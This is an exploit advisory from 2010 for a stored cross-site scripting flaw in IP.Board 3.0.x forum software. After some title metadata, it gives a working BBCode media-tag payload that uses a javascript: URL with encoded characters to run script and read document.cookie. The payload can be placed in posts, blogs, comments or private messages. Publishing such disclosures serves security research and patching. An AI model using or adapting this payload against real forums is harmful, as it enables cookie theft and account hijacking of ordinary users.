# Exploit Title: IP.Board 3.0.x XSS
# Date: 05/16/2010
# Author: Cryptovirus (http://de.crypt.in)
# Software Link: http://community.invisionpower.com/
# Version: 3.0.x
# Tested on: All
# Code :

The following code, when put in a post, blog entry, comment, or PM, lets
JavaScript run:

[media]javascript://%0aalert(document.cookie);%2F%2F.swf[/media]